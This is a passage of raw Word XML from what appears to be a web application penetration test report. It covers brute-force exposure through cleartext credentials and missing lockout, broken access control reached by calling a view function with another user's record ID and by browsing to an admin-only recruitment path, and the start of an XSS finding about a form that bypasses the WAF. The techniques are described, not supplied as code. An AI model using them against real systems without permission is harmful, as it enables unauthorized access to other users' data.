      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693BF211" w14:textId="4ADE497D" w:rsidR="00D91B69" w:rsidRPr="00D91B69" w:rsidRDefault="00D91B69" w:rsidP="00F90D63">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A brute-force attack is when an attacker uses a system of trial and error to guess </w:t>
      </w:r>
      <w:r w:rsidR="00A114CF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>valid user</w:t>
      </w:r>
      <w:r w:rsidR="00A114CF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials. These attacks are typically automated using wordlists of usernames and passwords. Automating this process, especially using dedicated tools, potentially enables an attacker to make vast numbers of login attempts at high speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366BBA73" w14:textId="06116D8C" w:rsidR="00F90D63" w:rsidRPr="00D23D4C" w:rsidRDefault="00F90D63" w:rsidP="00F90D63">
      <w:r>
        <w:t>The authentication process most likely uses Form-based Authentication. Using Burp Suite, which can be used to intercept and manipulate requests, the POST request for a logon attempt was intercepted. As seen below, the credentials sent over are revealed to be transmitted in clear text which would allow an attacker to perform credential stuffing or targeted attacks. Moreover, the web application does not enforce lockout policies after multiple failed logon attempts. Hence, a list of common passwords can be used to perform a dictionary attack on the login page to gain unauthorized access.</w:t>
      </w:r>
      <w:r w:rsidR="00506BFA" w:rsidRPr="00506BFA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCAEBC" w14:textId="65A438E0" w:rsidR="00F90D63" w:rsidRPr="00EC16E1" w:rsidRDefault="00506BFA" w:rsidP="00F90D63">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658277" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66DFC731" wp14:editId="5D9D87D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1664970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1213422" cy="107370"/>
                <wp:effectExtent l="0" t="0" r="25400" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="91" name="Rectangle 91"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1213422" cy="1073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5F3F8D">
              <v:rect id="Rectangle 91" style="position:absolute;margin-left:0;margin-top:131.1pt;width:95.55pt;height:8.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B7C2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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F90D63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FBB4F3" wp14:editId="1159A4C0">
            <wp:extent cx="5943600" cy="1913369"/>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42759"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1913369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76283DC8" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRDefault="00F90D63" w:rsidP="00F90D63"/>
    <w:p w14:paraId="00D7198C" w14:textId="77777777" w:rsidR="00F90D63" w:rsidRDefault="00F90D63" w:rsidP="00F90D63">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7D28A" w14:textId="77777777" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc94100234"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Broken Access Control Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="2A84F6EA" w14:textId="77777777" w:rsidR="00CE4A22" w:rsidRPr="00775377" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E153B8" w14:textId="7812A0E1" w:rsidR="00451A73" w:rsidRDefault="00451A73" w:rsidP="00CE4A22">
      <w:r>
        <w:t>Access control, or authorization, is the process of restricting users on what actions can be performed or what resources can be accessed by the user. Hence, Broken access controls are commonly encountered vulnerabilities where users can perform actions or access resources outside of their privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A012F5F" w14:textId="32713048" w:rsidR="00CE4A22" w:rsidRPr="00DA2178" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:r>
        <w:t>Inspecting the client-side code used on the web application revealed that the Detail button was linked to a function that reads a record from the database based on its record ID. As seen below, the view function is used when the button is clicked.</w:t>
      </w:r>
      <w:r w:rsidR="00F50BF5" w:rsidRPr="00F50BF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501516E" w14:textId="3B5603BD" w:rsidR="00CE4A22" w:rsidRDefault="00F50BF5" w:rsidP="00401B2E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658279" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F9C9C95" wp14:editId="094FAEF0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5203065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>823121</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="458861" cy="72122"/>
                <wp:effectExtent l="0" t="0" r="17780" b="23495"/>
                <wp:wrapNone/>
                <wp:docPr id="93" name="Rectangle 93"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="458861" cy="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2FFE3D">
              <v:rect id="Rectangle 93" style="position:absolute;margin-left:409.7pt;margin-top:64.8pt;width:36.15pt;height:5.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4097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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658278" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EA9922B" wp14:editId="3B16538B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3249930</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1154430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="262890" cy="171450"/>
                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="92" name="Rectangle 92"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="26289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142790">
              <v:rect id="Rectangle 92" style="position:absolute;margin-left:255.9pt;margin-top:90.9pt;width:20.7pt;height:1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B96D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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE4A22" w:rsidRPr="00892BDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7B5F1E" wp14:editId="3EF07646">
            <wp:extent cx="5977094" cy="1851239"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="18946403" name="Picture 189464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03" name="Picture 18946403" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5990756" cy="1855470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DAAE6" w14:textId="3E6D1BBE" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:r>
        <w:t xml:space="preserve">The view function was used in the Console section in the browser developer tools with the ID of 4, which was found to be a valid record ID. As shown below, a record belonging to another user was displayed. Notice that the date, category, and description displayed in the modal </w:t>
      </w:r>
      <w:r w:rsidR="00B171D7">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> different from the record above. This confirms that the authorization restriction measures in the web application are not correctly implemented and </w:t>
      </w:r>
      <w:r w:rsidR="000544BB">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerable to broken access control.</w:t>
      </w:r>
      <w:r w:rsidR="002435B3" w:rsidRPr="002435B3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2FA68" w14:textId="3232EAD8" w:rsidR="00082084" w:rsidRDefault="002435B3" w:rsidP="00082084">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658281" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66683B6E" wp14:editId="020BAC8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3814826</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>365459</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="194121" cy="78614"/>
                <wp:effectExtent l="0" t="0" r="15875" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="95" name="Rectangle 95"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="194121" cy="786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3FDB32">
              <v:rect id="Rectangle 95" style="position:absolute;margin-left:300.4pt;margin-top:28.8pt;width:15.3pt;height:6.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A6B9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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="617F0191" wp14:editId="48A2B929">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1373669</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>212370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1448145" cy="1679848"/>
                <wp:effectExtent l="0" t="0" r="19050" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="94" name="Rectangle 94"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1448145" cy="16798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E2D179">
              <v:rect id="Rectangle 94" style="position:absolute;margin-left:108.15pt;margin-top:16.7pt;width:114.05pt;height:132.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1570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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE4A22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E052DA5" wp14:editId="2C041CF4">
            <wp:extent cx="5120562" cy="2271975"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="18946408" name="Picture 189464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640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64139" cy="2291310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8E5B6" w14:textId="6B876832" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Moreover, based on the spidering results performed in the information gathering phase, there is a recruitment functionality that is not available in the Employee navigation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A22" w14:paraId="4D6079A2" w14:textId="77777777" w:rsidTr="00082084">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E5140EC" w14:textId="44B52B64" w:rsidR="00CE4A22" w:rsidRDefault="0017215C" w:rsidP="001025B4">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658282" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2703A2EB" wp14:editId="10CD3228">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>577134</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2436989</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1673150" cy="1480227"/>
                      <wp:effectExtent l="0" t="0" r="22860" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="96" name="Rectangle 96"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1673150" cy="14802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305F61">
                    <v:rect id="Rectangle 96" style="position:absolute;margin-left:45.45pt;margin-top:191.9pt;width:131.75pt;height:116.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556F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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00CE4A22" w:rsidRPr="00735EBA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EADF737" wp14:editId="61B7D314">
                  <wp:extent cx="2816352" cy="4347776"/>
                  <wp:effectExtent l="0" t="0" r="3175"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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2825671" cy="4362162"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E34745A" w14:textId="77777777" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="001025B4">
            <w:r w:rsidRPr="00735EBA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDBAEDC" wp14:editId="64299DB3">
                  <wp:extent cx="2610214" cy="4201111"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>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90"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2610214" cy="4201111"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09272CFF" w14:textId="77777777" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22"/>
    <w:p w14:paraId="3EF5F0C1" w14:textId="614EC5F3" w:rsidR="00CE4A22" w:rsidRDefault="00CE4A22" w:rsidP="00CE4A22">
      <w:r>
        <w:t xml:space="preserve">Modifying the URL to reflect the path of the function allowed a user to be granted unauthorized access </w:t>
      </w:r>
      <w:r w:rsidR="00443D0F">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a page that is exclusive for admin users only. As seen below, the link appended was “/recruitment/recruitment/recruitment_list”.</w:t>
      </w:r>
      <w:r w:rsidR="006302D3" w:rsidRPr="006302D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21E5D7" w14:textId="09984057" w:rsidR="00CE4A22" w:rsidRDefault="006302D3" w:rsidP="00082084">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658284" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30E8F4FD" wp14:editId="7A6E97E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1269187</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>449656</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="544983" cy="113386"/>
                <wp:effectExtent l="0" t="0" r="26670" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="98" name="Rectangle 98"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="544983" cy="113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5038E1">
              <v:rect id="Rectangle 98" style="position:absolute;margin-left:99.95pt;margin-top:35.4pt;width:42.9pt;height:8.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FFBD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VbgwIAAGg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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658283" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36A28D61" wp14:editId="3999CB8E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>709574</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-229</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276503" cy="113386"/>
                <wp:effectExtent l="0" t="0" r="19050" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="97" name="Rectangle 97"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276503" cy="113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4FE84D">
              <v:rect id="Rectangle 97" style="position:absolute;margin-left:55.85pt;margin-top:0;width:100.5pt;height:8.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E6E6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uBhA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE4A22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAF3F86" wp14:editId="26C91D82">
            <wp:extent cx="5132982" cy="2013708"/>
            <wp:effectExtent l="0" t="0" r="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50553" cy="2020601"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7FF37" w14:textId="712BF89F" w:rsidR="00B50C9D" w:rsidRDefault="00526507" w:rsidP="00BA5918">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc94100235"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="00BF6E2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidR="006B4EB1">
        <w:t xml:space="preserve"> Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="4A8CBA7E" w14:textId="49E153BD" w:rsidR="006A07B8" w:rsidRPr="007B3C7C" w:rsidRDefault="00775377" w:rsidP="007B3C7C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07A9EA" w14:textId="1AADD61F" w:rsidR="000B04CD" w:rsidRPr="00F802A1" w:rsidRDefault="000B04CD" w:rsidP="00E77D9E">
      <w:r>
        <w:t>Cross</w:t>
      </w:r>
      <w:r w:rsidR="00443D0F">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">site scripting is an attack vector that takes advantage of dynamically generated Web pages. In an XSS attack, a web application is sent with a script that activates when it is read by an unsuspecting user’s browser or by an application that has not protected itself against XSS. Because dynamic </w:t>
      </w:r>
      <w:r w:rsidR="00A17F6D">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>ebsites rely on user input, a malicious user can input malicious script</w:t>
      </w:r>
      <w:r w:rsidR="00E6554C">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the page by hiding it within legitimate requests.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F802A1">
        <w:t xml:space="preserve"> These scripts can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. It can also rewrite the content of the web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90560B" w14:textId="2C9BA751" w:rsidR="00404F68" w:rsidRDefault="00F34E3E" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">Detecting this vulnerability was </w:t>
      </w:r>
      <w:r w:rsidR="00F76CD2">
        <w:t>a challenge as</w:t>
      </w:r>
      <w:r w:rsidR="000F0C30">
        <w:t xml:space="preserve"> JavaScript elements submitted to the </w:t>
      </w:r>
      <w:r w:rsidR="00512A69">
        <w:t xml:space="preserve">backend </w:t>
      </w:r>
      <w:r w:rsidR="78E75FBF">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00CA0995">
        <w:t xml:space="preserve"> blocked due to the Web Application Firewall</w:t>
      </w:r>
      <w:r w:rsidR="00A24AB7">
        <w:t xml:space="preserve"> (WAF)</w:t>
      </w:r>
      <w:r w:rsidR="00CA0995">
        <w:t xml:space="preserve">. However, after </w:t>
      </w:r>
      <w:r w:rsidR="00A7447C">
        <w:t xml:space="preserve">manually testing </w:t>
      </w:r>
      <w:r w:rsidR="00A24AB7">
        <w:t xml:space="preserve">numerous forms, one entry point was discovered </w:t>
      </w:r>
      <w:r w:rsidR="008942BF">
        <w:t xml:space="preserve">which was not </w:t>
      </w:r>
      <w:r w:rsidR="00A24AB7">
        <w:t>verified by the WAF and allow</w:t>
      </w:r>
      <w:r w:rsidR="002C27EF">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00A24AB7">
        <w:t xml:space="preserve"> JavaScript elements to be stored in the database.</w:t>
      </w:r>
      <w:r w:rsidR="003F2D8D" w:rsidRPr="003F2D8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF26BE" w14:textId="6A6E9FCC" w:rsidR="00A90A85" w:rsidRPr="009045D1" w:rsidRDefault="003F2D8D" w:rsidP="009045D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658285" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65801A36" wp14:editId="0CB26FC8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2148560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>811927</wp:posOffset>
                </wp:positionV>
